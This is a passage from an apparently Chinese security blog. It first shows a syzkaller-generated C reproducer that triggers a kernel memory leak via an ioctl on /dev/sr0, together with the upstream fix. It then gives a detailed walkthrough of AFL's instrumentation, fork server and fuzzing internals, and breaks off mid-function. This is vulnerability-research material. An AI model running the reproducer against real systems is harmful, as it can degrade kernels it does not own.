current_time_ms(); if (write(fd, "scan", 4) != 4) exit(1); sleep(1); while (current_time_ms() - start < 4 * 1000) sleep(1); if (write(fd, "scan", 4) != 4) exit(1); static char buf[128 << 10]; ssize_t n = read(fd, buf, sizeof(buf) - 1); if (n < 0) exit(1); int nleaks = 0; if (n != 0) { sleep(1); if (write(fd, "scan", 4) != 4) exit(1); if (lseek(fd, 0, SEEK_SET) < 0) exit(1); n = read(fd, buf, sizeof(buf) - 1); if (n < 0) exit(1); buf[n] = 0; char* pos = buf; char* end = buf + n; while (pos < end) { char* next = strstr(pos + 1, "unreferenced object"); if (!next) next = end; char prev = *next; *next = 0; fprintf(stderr, "BUG: memory leak\\n%s\\n", pos); *next = prev; pos = next; nleaks++; } } if (write(fd, "clear", 5) != 5) exit(1); close(fd); if (nleaks) exit(1);}static void execute_one(void);#define WAIT_FLAGS __WALLstatic void loop(void){ int iter = 0; for (;; iter++) { int pid = fork(); if (pid < 0) exit(1); if (pid == 0) { setup_test(); execute_one(); exit(0); } int status = 0; uint64_t start = current_time_ms(); for (;;) { if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) break; sleep_ms(1); if (current_time_ms() - start < 5000) continue; kill_and_wait(pid, &status); break; } check_leaks(); }}uint64_t r[1] = {0xffffffffffffffff};void execute_one(void){ intptr_t res = 0;memcpy((void*)0x20000200, "/dev/sr0\\000", 9); res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000200ul, /*flags=*/0x1a9802ul, /*mode=*/0ul); if (res != -1) r[0] = res;*(uint32_t*)0x20000740 = 0x53;*(uint32_t*)0x20000744 = 0xfffffffe;*(uint8_t*)0x20000748 = 0xa;*(uint8_t*)0x20000749 = 0;*(uint16_t*)0x2000074a = 0;*(uint32_t*)0x2000074c = 
0x20000;*(uint64_t*)0x20000750 = 0;*(uint64_t*)0x20000758 = 0x200005c0;memcpy((void*)0x200005c0, "\\xf6\\xc7\\x8b\\x31\\x9f\\x83\\x19\\xde\\xb1\\x3d", 10);*(uint64_t*)0x20000760 = 0x20000600;*(uint32_t*)0x20000768 = 0;*(uint32_t*)0x2000076c = 0;*(uint32_t*)0x20000770 = 0;*(uint64_t*)0x20000774 = 0;*(uint8_t*)0x2000077c = 0;*(uint8_t*)0x2000077d = 0;*(uint8_t*)0x2000077e = 0;*(uint8_t*)0x2000077f = 0;*(uint16_t*)0x20000780 = 0;*(uint16_t*)0x20000782 = 0;*(uint32_t*)0x20000784 = 0;*(uint32_t*)0x20000788 = 0;*(uint32_t*)0x2000078c = 0; syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x2285, /*arg=*/0x20000740ul);}int main(void){ syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); setup_leak(); loop(); return 0;} 由于没有对syzkaller自定义syzlang,因此此漏洞大概率能被syzbot(一个基于syzkaller的内核自动测试bot)发现: 通过搜索,果然找到了2023-08-17的相关讨论:https://lore.kernel.org/all/[email protected]/T/ 12345678910111213141516diff --git a/lib/iov_iter.c b/lib/iov_iter.cindex 27234a820eeb..c3fd0448dead 100644--- a/lib/iov_iter.c+++ b/lib/iov_iter.c@@ -1780,8 +1780,10 @@ static ssize_t iov_iter_extract_user_pages(struct iov_iter *i, if (!maxpages) return -ENOMEM; res = pin_user_pages_fast(addr, maxpages, gup_flags, *pages);- if (unlikely(res <= 0))+ if (unlikely(res <= 0)) {+ kvfree(*pages); return res;+ } maxsize = min_t(size_t, maxsize, res * PAGE_SIZE - offset); iov_iter_advance(i, maxsize); return maxsize; 查看修复patch,符合之前发现的漏洞情形","categories":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/categories/Fuzz/"}],"tags":[{"name":"Kernel","slug":"Kernel","permalink":"https://v3rdant.cn/tags/Kernel/"},{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/tags/Fuzz/"}]},{"title":"Fuzz.AFL-All-in-One","slug":"Fuzz.AFL-All-in-One","date":"2024-01-12T13:52:38.000Z","updated":"2024-03-04T07:47:22.258Z","comments":true,"path":"Fuzz.AFL-All-in-One/","link":"","permalink":"https://v3rdant.cn/Fuzz.AFL-All-in-One/","excerpt":"","text":"overview 对于AFL代码的重新阅读,笔者之前曾经阅读过一次AFL代码,但是比较粗糙,所以决定重新阅读一遍,理解其中比较细节的部分。 首先简单介绍一下AFL,AFL是一个覆盖率引导的fuzz 工具。 它将一个无跳转的顺序执行流程看成一个基本块,并通过一个bitmap记录运行时每一个输入对应的标准块。 通过基本块的覆盖率引导对于输入种子的变异,从而不断变换输入,进行测试,来挖掘漏洞。 afl-gcc/afl-as | 代码插桩 afl的核心思想是覆盖率引导,为了能够得到运行时代码覆盖率,AFL需要在编译时对产生的汇编代码进行插桩,在每个基本块前插入的桩代码能够写入对应bitmap,记录运行时当前覆盖率 这是通过对gcc和as的封装实现的,也即通过封装编译器以及汇编器,来实现编译时插桩。 afl-gcc 的核心逻辑很简单 只是对于gcc,做了一些参数处理的封装,让gcc启用一些配合fuzz的编译参数,并且使用封装好的afl-as作为汇编器 12345678910111213141516171819202122232425262728293031323334353637383940int main(int argc, char **argv){ if (isatty(2) && !getenv("AFL_QUIET")) { SAYF(cCYA "afl-cc " cBRI VERSION cRST " by <[email protected]>\\n"); } else be_quiet = 1; if (argc < 2) { SAYF("\\n" "This is a helper application for afl-fuzz. It serves as a drop-in replacement\\n" "for gcc or clang, letting you recompile third-party code with the required\\n" "runtime instrumentation. 
A common use pattern would be one of the following:\\n\\n" " CC=%s/afl-gcc ./configure\\n" " CXX=%s/afl-g++ ./configure\\n\\n" "You can specify custom next-stage toolchain via AFL_CC, AFL_CXX, and AFL_AS.\\n" "Setting AFL_HARDEN enables hardening optimizations in the compiled code.\\n\\n", BIN_PATH, BIN_PATH); exit(1); } find_as(argv[0]); // 首先找到封装的afl-as edit_params(argc, argv); // 然后对于参数进行处理传给真正的编译器 execvp(cc_params[0], (char **)cc_params); // 然后运行编译器 FATAL("Oops, failed to execute '%s' - check your PATH", cc_params[0]); return 0;} 然后是afl-as,他是as的封装,插桩就是在此完成的, 这里主要关注插装的实现 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677int main(int argc, char** argv) { s32 pid; u32 rand_seed; int status; u8* inst_ratio_str = getenv("AFL_INST_RATIO"); struct timeval tv; struct timezone tz; clang_mode = !!getenv(CLANG_ENV_VAR); if (isatty(2) && !getenv("AFL_QUIET")) { SAYF(cCYA "afl-as " cBRI VERSION cRST " by <[email protected]>\\n"); } else be_quiet = 1; if (argc < 2) { SAYF("\\n" "This is a helper application for afl-fuzz. It is a wrapper around GNU 'as',\\n" "executed by the toolchain whenever using afl-gcc or afl-clang. You probably\\n" "don't want to run this program directly.\\n\\n" "Rarely, when dealing with extremely complex projects, it may be advisable to\\n" "set AFL_INST_RATIO to a value less than 100 in order to reduce the odds of\\n" "instrumenting every discovered branch.\\n\\n"); exit(1); } gettimeofday(&tv, &tz); rand_seed = tv.tv_sec ^ tv.tv_usec ^ getpid(); srandom(rand_seed); edit_params(argc, argv); if (inst_ratio_str) { if (sscanf(inst_ratio_str, "%u", &inst_ratio) != 1 || inst_ratio > 100) FATAL("Bad value of AFL_INST_RATIO (must be between 0 and 100)"); } if (getenv(AS_LOOP_ENV_VAR)) FATAL("Endless loop when calling 'as' (remove '.' from your PATH)"); setenv(AS_LOOP_ENV_VAR, "1", 1); /* When compiling with ASAN, we don't have a particularly elegant way to skip ASAN-specific branches. But we can probabilistically compensate for that... 
*/ if (getenv("AFL_USE_ASAN") || getenv("AFL_USE_MSAN")) { sanitizer = 1; inst_ratio /= 3; } if (!just_version) add_instrumentation(); if (!(pid = fork())) { execvp(as_params[0], (char**)as_params); FATAL("Oops, failed to execute '%s' - check your PATH", as_params[0]); } if (pid < 0) PFATAL("fork() failed"); if (waitpid(pid, &status, 0) <= 0) PFATAL("waitpid() failed"); if (!getenv("AFL_KEEP_ASSEMBLY")) unlink(modified_file); exit(WEXITSTATUS(status));} 插装的核心在于调用的 add_instrumentation 函数 add_instrumentation add_instrumentation 就是实际用来插桩的函数。 此函数首先打开input文件和output文件 1234567891011121314151617181920212223242526272829303132static void add_instrumentation(void) { static u8 line[MAX_LINE]; FILE* inf; FILE* outf; s32 outfd; u32 ins_lines = 0; u8 instr_ok = 0, skip_csect = 0, skip_next_label = 0, skip_intel = 0, skip_app = 0, instrument_next = 0;#ifdef __APPLE__ u8* colon_pos;#endif /* __APPLE__ */ if (input_file) { inf = fopen(input_file, "r"); if (!inf) PFATAL("Unable to read '%s'", input_file); } else inf = stdin; outfd = open(modified_file, O_WRONLY | O_EXCL | O_CREAT, 0600); if (outfd < 0) PFATAL("Unable to write to '%s'", modified_file); outf = fdopen(outfd, "w"); if (!outf) PFATAL("fdopen() failed"); 然后开始循环遍历input文件 1 while (fgets(line, MAX_LINE, inf)) { 在特定位置插桩代码,这里的几个flag的值将在后面解释,简单来说,就是用来找到需要插桩的基本块的开头。这几个flag就是用来识别当前是否是基本块的开头。如果是是,就需要进行插桩 12345678910if (!pass_thru && !skip_intel && !skip_app && !skip_csect && instr_ok && instrument_next && line[0] == '\\t' && isalpha(line[1])) { fprintf(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE)); instrument_next = 0; ins_lines++;} 无论是否进行了插桩,最后都要将原行写入输出文件 1fputs(line, outf); 由于一般只在text段插桩,所以要在找到此段,并且用 instr_ok 来标识 1234567891011121314151617181920212223242526272829303132if (pass_thru) continue;/* All right, this is where the actual fun begins. For one, we only want to instrument the .text section. So, let's keep track of that in processed files - and let's set instr_ok accordingly. */if (line[0] == '\\t' && line[1] == '.') { /* OpenBSD puts jump tables directly inline with the code, which is a bit annoying. They use a specific format of p2align directives around them, so we use that as a signal. */ if (!clang_mode && instr_ok && !strncmp(line + 2, "p2align ", 8) && isdigit(line[10]) && line[11] == '\\n') skip_next_label = 1; if (!strncmp(line + 2, "text\\n", 5) || !strncmp(line + 2, "section\\t.text", 13) || !strncmp(line + 2, "section\\t__TEXT,__text", 21) || !strncmp(line + 2, "section __TEXT,__text", 21)) { instr_ok = 1; continue; } if (!strncmp(line + 2, "section\\t", 8) || !strncmp(line + 2, "section ", 8) || !strncmp(line + 2, "bss\\n", 4) || !strncmp(line + 2, "data\\n", 5)) { instr_ok = 0; continue; }} skip_csect 用来跳过无用段,比如64位程序中的.code32段 123456if (strstr(line, ".code")) { if (strstr(line, ".code32")) skip_csect = use_64bit; if (strstr(line, ".code64")) skip_csect = !use_64bit;} 跳过intel 风格的汇编 12if (strstr(line, ".intel_syntax")) skip_intel = 1;if (strstr(line, ".att_syntax")) skip_intel = 0; 跳过 ad-hoc __asm__ 字段 123456if (line[0] == '#' || line[1] == '#') { if (strstr(line, "#APP")) skip_app = 1; if (strstr(line, "#NO_APP")) skip_app = 0;} 然后,对于条件跳转,可以直接区分出基本块,所以可以直接插桩 12345678910111213if (line[0] == '\\t') { if (line[1] == 'j' && line[2] != 'm' && R(100) < inst_ratio) { fprintf(outf, use_64bit ? 
trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE)); ins_lines++; } continue;} 识别跳转标签来插桩,并且针对不同平台进行处理 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162#ifdef __APPLE__ /* Apple: L<whatever><digit>: */ if ((colon_pos = strstr(line, ":"))) { if (line[0] == 'L' && isdigit(*(colon_pos - 1))) {#else /* Everybody else: .L<whatever>: */ if (strstr(line, ":")) { if (line[0] == '.') {#endif /* __APPLE__ */ /* .L0: or LBB0_0: style jump destination */#ifdef __APPLE__ /* Apple: L<num> / LBB<num> */ if ((isdigit(line[1]) || (clang_mode && !strncmp(line, "LBB", 3))) && R(100) < inst_ratio) {#else /* Apple: .L<num> / .LBB<num> */ if ((isdigit(line[2]) || (clang_mode && !strncmp(line + 1, "LBB", 3))) && R(100) < inst_ratio) {#endif /* __APPLE__ */ /* An optimization is possible here by adding the code only if the label is mentioned in the code in contexts other than call / jmp. That said, this complicates the code by requiring two-pass processing (messy with stdin), and results in a speed gain typically under 10%, because compilers are generally pretty good about not generating spurious intra-function jumps. We use deferred output chiefly to avoid disrupting .Lfunc_begin0-style exception handling calculations (a problem on MacOS X). */ if (!skip_next_label) instrument_next = 1; else skip_next_label = 0; } } else { /* Function label (always instrumented, deferred mode). */ instrument_next = 1; } } } 最后,如果进行了插桩,再插入main_payload 1234567891011121314151617if (ins_lines) fputs(use_64bit ? main_payload_64 : main_payload_32, outf);if (input_file) fclose(inf);fclose(outf);if (!be_quiet) { if (!ins_lines) WARNF("No instrumentation targets found%s.", pass_thru ? " (pass-thru mode)" : ""); else OKF("Instrumented %u locations (%s-bit, %s mode, ratio %u%%).", ins_lines, use_64bit ? "64" : "32", getenv("AFL_HARDEN") ? "hardened" : (sanitizer ? "ASAN/MSAN" : "non-hardened"), inst_ratio); } 所以,综合来看,其实最终就是插入了两个部分: 在每个基本块前面插入了trampoline_fmt 在整体后面插入了main_payload trampoline_fmt_64 trampoline直译为蹦床代码,一般是在两种运行环境之间桥接的代码,比如不同语言写的代码之间的参数转换以及环境保存和恢复。 afl在插桩时,会根据架构的不同,插入两种不同的 trampoline_fmt 代码,此代码用来在每个基本块运行前,写入对应的全局的bitmap,用来标识当前进程运行时经过此基本块方便后面计算覆盖率以及发现新路径 这里的trampoline_fmt_64就是64位下的相应代码 123456789101112131415161718192021static const u8* trampoline_fmt_64 = "\\n" "/* --- AFL TRAMPOLINE (64-BIT) --- */\\n" "\\n" ".align 4\\n" "\\n" "leaq -(128+24)(%%rsp), %%rsp\\n" "movq %%rdx, 0(%%rsp)\\n" "movq %%rcx, 8(%%rsp)\\n" "movq %%rax, 16(%%rsp)\\n" "movq $0x%08x, %%rcx\\n" "call __afl_maybe_log\\n" "movq 16(%%rsp), %%rax\\n" "movq 8(%%rsp), %%rcx\\n" "movq 0(%%rsp), %%rdx\\n" "leaq (128+24)(%%rsp), %%rsp\\n" "\\n" "/* --- END --- */\\n" "\\n"; 这是一段跳转代码, 前面用于保存参数,核心在于 12"movq $0x%08x, %%rcx\\n""call __afl_maybe_log\\n" 在上文中可以看到,这里的rcx的值是fprintf 格式化的一个随机值,用来标识代码块,笔者其实有点疑惑为什么不用一个从0开始的值,然后一个个加上去,避免重复。 12fprintf(outf, use_64bit ? trampoline_fmt_64 : trampoline_fmt_32, R(MAP_SIZE)); 核心调用的__afl_maybe_log 在 main_payload 中实现 main_payload_64 main_payload_64包含 trampoline_fmt 运行时所需要的一些函数以及全局变量,其中最核心的是 __afl_maybe_log 函数 这里整个流程大致如下(图源ScUpax0s师傅) 简单解释一下就是,在第一此运行时, __afl_area_ptr==NULL 和 __afl_alobal_area==NULL 均为true,说明此时是第一次运行到__afl_maybe_log ,此时会进入下面的分支,在完成初始化后,进程阻塞从管道中读取,直到收到afl-fuzz进程发送过来的启动命令,此时会fork一个子进程,此子进程并恢复寄存器,然后继续运行。 在之后,子进程再次进入桩代码就会直接进入 __afl_store,也就是写入当前基本块对应的bitmap用来标识运行状态 第一次运行 初始化 首先是检查共享内存是否初始化,也就是检查 __afl_area_ptr 是否为NULL 12345678" seto %al\\n""\\n"" /* Check if SHM region is already mapped. 
*/\\n""\\n"" movq __afl_area_ptr(%rip), %rdx\\n"" testq %rdx, %rdx\\n"" je __afl_setup\\n""\\n" 如果没有,初始化共享内存并将指针保存至 __afl_area_ptr 和 __afl_global_area 这里的共享内存的id 通过环境变量来传递,通过getenv获取 AFL_SHM_ENV ,然后map出共享内存,此共享内存用来保存运行时的bitmap,需要注意的是,虽然名为bitmap,但实际上此时,这里的bitmap仍然是用一byte而不是一bit来标识相应区域是否运行到的,因为此时可以通过byte位记录运行次数,并且对于每一位的访问也要比真正的bitmap快一些。 真正的bitmap要在之后,在afl-fuzz中,通过共享内存获得运行结果后,将此处对应的内存压缩成为真正的bitmap 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293 "__afl_setup:\\n" "\\n" " /* Do not retry setup if we had previous failures. */\\n" "\\n" " cmpb $0, __afl_setup_failure(%rip)\\n" " jne __afl_return\\n" "\\n" " /* Check out if we have a global pointer on file. */\\n" "\\n"#ifndef __APPLE__ " movq __afl_global_area_ptr@GOTPCREL(%rip), %rdx\\n" " movq (%rdx), %rdx\\n"#else " movq __afl_global_area_ptr(%rip), %rdx\\n"#endif /* !^__APPLE__ */ " testq %rdx, %rdx\\n" " je __afl_setup_first\\n" "\\n" " movq %rdx, __afl_area_ptr(%rip)\\n" " jmp __afl_store\\n" "\\n" "__afl_setup_first:\\n" "\\n" " /* Save everything that is not yet saved and that may be touched by\\n" " getenv() and several other libcalls we'll be relying on. */\\n" "\\n" " leaq -352(%rsp), %rsp\\n" "\\n" " movq %rax, 0(%rsp)\\n" " movq %rcx, 8(%rsp)\\n" " movq %rdi, 16(%rsp)\\n" " movq %rsi, 32(%rsp)\\n" " movq %r8, 40(%rsp)\\n" " movq %r9, 48(%rsp)\\n" " movq %r10, 56(%rsp)\\n" " movq %r11, 64(%rsp)\\n" "\\n" " movq %xmm0, 96(%rsp)\\n" " movq %xmm1, 112(%rsp)\\n" " movq %xmm2, 128(%rsp)\\n" " movq %xmm3, 144(%rsp)\\n" " movq %xmm4, 160(%rsp)\\n" " movq %xmm5, 176(%rsp)\\n" " movq %xmm6, 192(%rsp)\\n" " movq %xmm7, 208(%rsp)\\n" " movq %xmm8, 224(%rsp)\\n" " movq %xmm9, 240(%rsp)\\n" " movq %xmm10, 256(%rsp)\\n" " movq %xmm11, 272(%rsp)\\n" " movq %xmm12, 288(%rsp)\\n" " movq %xmm13, 304(%rsp)\\n" " movq %xmm14, 320(%rsp)\\n" " movq %xmm15, 336(%rsp)\\n" "\\n" " /* Map SHM, jumping to __afl_setup_abort if something goes wrong. */\\n" "\\n" " /* The 64-bit ABI requires 16-byte stack alignment. We'll keep the\\n" " original stack ptr in the callee-saved r12. */\\n" "\\n" " pushq %r12\\n" " movq %rsp, %r12\\n" " subq $16, %rsp\\n" " andq $0xfffffffffffffff0, %rsp\\n" "\\n" " leaq .AFL_SHM_ENV(%rip), %rdi\\n" CALL_L64("getenv") "\\n" " testq %rax, %rax\\n" " je __afl_setup_abort\\n" "\\n" " movq %rax, %rdi\\n" CALL_L64("atoi") "\\n" " xorq %rdx, %rdx /* shmat flags */\\n" " xorq %rsi, %rsi /* requested addr */\\n" " movq %rax, %rdi /* SHM ID */\\n" CALL_L64("shmat") "\\n" " cmpq $-1, %rax\\n" " je __afl_setup_abort\\n" "\\n" " /* Store the address of the SHM region. */\\n" "\\n" " movq %rax, %rdx\\n" " movq %rax, __afl_area_ptr(%rip)\\n" "\\n"#ifdef __APPLE__ " movq %rax, __afl_global_area_ptr(%rip)\\n"#else " movq __afl_global_area_ptr@GOTPCREL(%rip), %rdx\\n" " movq %rax, (%rdx)\\n"#endif /* ^__APPLE__ */ " movq %rax, %rdx\\n" 然后再通过管道通知主进程此进程已经准备好了 123456789101112131415161718192021"__afl_forkserver:\\n""\\n"" /* Enter the fork server mode to avoid the overhead of execve() calls. We\\n"" push rdx (area ptr) twice to keep stack alignment neat. */\\n""\\n"" pushq %rdx\\n"" pushq %rdx\\n""\\n"" /* Phone home and tell the parent that we're OK. (Note that signals with\\n"" no SA_RESTART will mess it up). If this fails, assume that the fd is\\n"" closed because we were execve()d from an instrumented binary, or because\\n"" the parent doesn't want to use the fork server. 
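/* For reference (simplified summary, not part of the AFL listing itself): the
   counterpart on the afl-fuzz side lives in init_forkserver() and run_target().
   afl-fuzz waits for these 4 "hello" bytes on FORKSRV_FD + 1; then, for every
   execution, it writes 4 bytes to FORKSRV_FD to wake __afl_fork_wait_loop, reads
   the forked child's pid from FORKSRV_FD + 1, and finally reads the 4-byte wait
   status relayed after waitpid(). run_target() combines that status with its own
   timeout bookkeeping to classify the run as FAULT_NONE, FAULT_TMOUT or FAULT_CRASH. */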
*/\\n""\\n"" movq $4, %rdx /* length */\\n"" leaq __afl_temp(%rip), %rsi /* data */\\n"" movq $" STRINGIFY((FORKSRV_FD + 1)) ", %rdi /* file desc */\\n"CALL_L64("write")"\\n"" cmpq $4, %rax\\n"" jne __afl_fork_resume\\n""\\n" __afl_fork_wait_loop __afl_fork_wait_loop 的作用是阻塞当前进程,直到从管道收到主进程发来的运行命令,如果收到了信号,则fork一个子进程,并调用 __afl_fork_resume 继续运行,否则继续阻塞 这里的和afl-fuzz通信用的管道的fd是相互约定好的,我们直到,此代码会插桩在需要fuzz的程序中,afl-fuzz会通过fork启动此程序,而fork是会继承文件描述符的,因此只要双方约定好一个确定的较大的文件描述符,即可相互通信 123456789101112131415161718192021222324252627282930313233343536373839404142434445"__afl_fork_wait_loop:\\n""\\n"" /* Wait for parent by reading from the pipe. Abort if read fails. */\\n""\\n"" movq $4, %rdx /* length */\\n"" leaq __afl_temp(%rip), %rsi /* data */\\n"" movq $" STRINGIFY(FORKSRV_FD) ", %rdi /* file desc */\\n"CALL_L64("read")" cmpq $4, %rax\\n"" jne __afl_die\\n""\\n"" /* Once woken up, create a clone of our process. This is an excellent use\\n"" case for syscall(__NR_clone, 0, CLONE_PARENT), but glibc boneheadedly\\n"" caches getpid() results and offers no way to update the value, breaking\\n"" abort(), raise(), and a bunch of other things :-( */\\n""\\n"CALL_L64("fork")" cmpq $0, %rax\\n"" jl __afl_die\\n"" je __afl_fork_resume\\n""\\n"" /* In parent process: write PID to pipe, then wait for child. */\\n""\\n"" movl %eax, __afl_fork_pid(%rip)\\n""\\n"" movq $4, %rdx /* length */\\n"" leaq __afl_fork_pid(%rip), %rsi /* data */\\n"" movq $" STRINGIFY((FORKSRV_FD + 1)) ", %rdi /* file desc */\\n"CALL_L64("write")"\\n"" movq $0, %rdx /* no flags */\\n"" leaq __afl_temp(%rip), %rsi /* status */\\n"" movq __afl_fork_pid(%rip), %rdi /* PID */\\n"CALL_L64("waitpid")" cmpq $0, %rax\\n"" jle __afl_die\\n""\\n"" /* Relay wait status to pipe, then loop back. */\\n""\\n"" movq $4, %rdx /* length */\\n"" leaq __afl_temp(%rip), %rsi /* data */\\n"" movq $" STRINGIFY((FORKSRV_FD + 1)) ", %rdi /* file desc */\\n"CALL_L64("write")"\\n"" jmp __afl_fork_wait_loop\\n" __afl_fork_resume 用于恢复运行 实际上就是恢复了在栈中的寄存器 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950"__afl_fork_resume:\\n""\\n"" /* In child process: close fds, resume execution. */\\n""\\n"" movq $" STRINGIFY(FORKSRV_FD) ", %rdi\\n"CALL_L64("close")"\\n"" movq $" STRINGIFY((FORKSRV_FD + 1)) ", %rdi\\n"CALL_L64("close")"\\n"" popq %rdx\\n"" popq %rdx\\n""\\n"" movq %r12, %rsp\\n"" popq %r12\\n""\\n"" movq 0(%rsp), %rax\\n"" movq 8(%rsp), %rcx\\n"" movq 16(%rsp), %rdi\\n"" movq 32(%rsp), %rsi\\n"" movq 40(%rsp), %r8\\n"" movq 48(%rsp), %r9\\n"" movq 56(%rsp), %r10\\n"" movq 64(%rsp), %r11\\n""\\n"" movq 96(%rsp), %xmm0\\n"" movq 112(%rsp), %xmm1\\n"" movq 128(%rsp), %xmm2\\n"" movq 144(%rsp), %xmm3\\n"" movq 160(%rsp), %xmm4\\n"" movq 176(%rsp), %xmm5\\n"" movq 192(%rsp), %xmm6\\n"" movq 208(%rsp), %xmm7\\n"" movq 224(%rsp), %xmm8\\n"" movq 240(%rsp), %xmm9\\n"" movq 256(%rsp), %xmm10\\n"" movq 272(%rsp), %xmm11\\n"" movq 288(%rsp), %xmm12\\n"" movq 304(%rsp), %xmm13\\n"" movq 320(%rsp), %xmm14\\n"" movq 336(%rsp), %xmm15\\n""\\n"" leaq 352(%rsp), %rsp\\n""\\n"" jmp __afl_store\\n""\\n""__afl_die:\\n""\\n"" xorq %rax, %rax\\n"CALL_L64("_exit") __afl_store __afl_store 用来更新bitmap状态 1234567891011121314 "__afl_store:\\n" "\\n" " /* Calculate and store hit for the code location specified in rcx. 
*/\\n" "\\n"#ifndef COVERAGE_ONLY " xorq __afl_prev_loc(%rip), %rcx\\n" " xorq %rcx, __afl_prev_loc(%rip)\\n" " shrq $1, __afl_prev_loc(%rip)\\n"#endif /* ^!COVERAGE_ONLY */ "\\n"#ifdef SKIP_COUNTS " orb $1, (%rdx, %rcx, 1)\\n"#else " incb (%rdx, %rcx, 1)\\n" 此处笔者其实还没有完全理解,这里的rcx实际上是trampoline中送来的标识每一个基本块的随机id,此处的代码用随机id异或上一个运行的桩的随机id来作为当前块在bitmap里的offset,并将此offset处的计数加一,用来表示对应的基本块运行了一次,同时,将此id存入 __afl_prev_loc 使用,记录为上一次桩的随机id,并右移一位。 这里offset是怎么保证不重复的呢,笔者感觉应该是跟线性同余随机算法的特性有关,不过由于不是笔者的重点,所以笔者暂且不过多探究。 afl-fuzz | 一次fuzz的标准流程 全局变量 首先是bitmap相关 12345EXP_ST u8 *trace_bits; // 和子进程共享的bitmap,程序运行的结果就存在于此bitmap中EXP_ST u8 virgin_bits[MAP_SIZE], // 标记仍然没有被触及到的区域 virgin_tmout[MAP_SIZE], // 标记还没有出现在tmout的区域 virgin_crash[MAP_SIZE]; // 标记还没有出现在crash的区域 然后是testcase组成的队列,每一个testcase会在初始化时被初始化为queue中的一个实体 123456789101112131415161718192021222324252627282930313233struct queue_entry{ u8 *fname; /* File name for the test case */ u32 len; /* Input length */ u8 cal_failed, /* Calibration failed? */ trim_done, /* Trimmed? */ was_fuzzed, /* Had any fuzzing done yet? */ passed_det, /* Deterministic stages passed? */ has_new_cov, /* Triggers new coverage? */ var_behavior, /* Variable behavior? */ favored, /* Currently favored? */ fs_redundant; /* Marked as redundant in the fs? */ u32 bitmap_size, /* Number of bits set in bitmap */ exec_cksum; /* Checksum of the execution trace */ u64 exec_us, /* Execution time (us) */ handicap, /* Number of queue cycles behind */ depth; /* Path depth */ u8 *trace_mini; /* Trace bytes, if kept */ u32 tc_ref; /* Trace bytes ref count */ struct queue_entry *next, /* Next element, if any */ *next_100; /* 100 elements ahead */};static struct queue_entry *queue, /* Fuzzing queue (linked list) */ *queue_cur, // 当前处理的testscase *queue_top, // testcase list的顶部 *q_prev100; // 前100标记 然后是与queue相关的一些变量 12345678910111213141516EXP_ST u32 queued_paths, // queued_variable, // 存在可变区域的testcase的数量 queued_at_start, // testcase 的初始数量 queued_discovered, // 运行时发现的数量 queued_imported, // 通过-S引入的数量 queued_favored, // favored_queue 的数量 queued_with_cov, // 存在新覆盖的queue的数量 pending_not_fuzzed, // 还没有被fuzz的数量 pending_favored, // 还没有被fuzz的favored_queue的数量 cur_skipped_paths, /* Abandoned inputs in cur cycle */ cur_depth, /* Current path depth */ max_depth, /* Max path depth */ useless_at_start, /* Number of useless starting paths */ var_byte_count, /* Bitmap bytes with var behavior */ current_entry, /* Current queue entry ID */ havoc_div = 1; /* Cycle count divisor for havoc */ main fuzz的开始是对于参数的解析 123456789case 'i': /* input dir */ if (in_dir) FATAL("Multiple -i options not supported"); in_dir = optarg; if (!strcmp(in_dir, "-")) in_place_resume = 1; break; .... 
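Before following main() further, it is worth restating in plain C what the instrumentation writes into trace_bits and how afl-fuzz reads it back, since everything below (virgin_bits, calibration, queue culling) builds on these two operations. The first sketch is the rough C equivalent of the __afl_store assembly discussed above (cf. the pseudo-code in AFL's docs/technical_details.txt); the function name afl_maybe_log and the standalone layout are illustrative, not AFL's actual emitted code.

#include <stdint.h>

#define MAP_SIZE (1 << 16)

static uint8_t  shared_mem[MAP_SIZE];   /* the SHM region afl-fuzz maps as trace_bits */
static uint16_t prev_location;          /* __afl_prev_loc */

/* Executed by the trampoline at every instrumented basic block;
   cur_location is the compile-time random id R(MAP_SIZE) that afl-as
   patched into the trampoline. */
static inline void afl_maybe_log(uint16_t cur_location)
{
    shared_mem[cur_location ^ prev_location]++;  /* bump the hit count of the edge prev -> cur */
    prev_location = cur_location >> 1;           /* the shift keeps A->B distinct from B->A,
                                                    and A->A distinct from B->B */
}

The xor means a byte in the map identifies an edge (an ordered pair of blocks) rather than a single block, and the right shift preserves edge direction and keeps tight self-loops apart. Note that the resulting offsets are not guaranteed to be unique: AFL deliberately accepts a small probability of edge collisions in exchange for a tiny constant-time update, and the whitepaper quantifies the expected collision rate for typical program sizes, so no property of the random number generator is relied on here. As for why a compile-time random id is used instead of a sequential counter: afl-as processes each assembly file in isolation, so random ids need no global coordination across object files and libraries; that is the commonly cited rationale rather than something stated in the source. On the afl-fuzz side, the question "did this run reach anything new?" is answered by comparing trace_bits against the virgin_* maps declared above. A simplified, byte-at-a-time sketch of that check follows; real AFL first buckets the raw hit counts (classify_counts()) and walks the map a word at a time, both omitted here.

#include <stdint.h>

#define MAP_SIZE (1 << 16)

/* Returns 2 if the run touched an edge that was never seen before, 1 if it
   only produced a new hit-count bucket for a known edge, 0 otherwise.
   Edges that were hit are cleared from the virgin map as a side effect. */
static int has_new_bits_sketch(const uint8_t *trace_bits, uint8_t *virgin_map)
{
    int ret = 0;

    for (uint32_t i = 0; i < MAP_SIZE; i++) {
        uint8_t cur = trace_bits[i];
        uint8_t vir = virgin_map[i];

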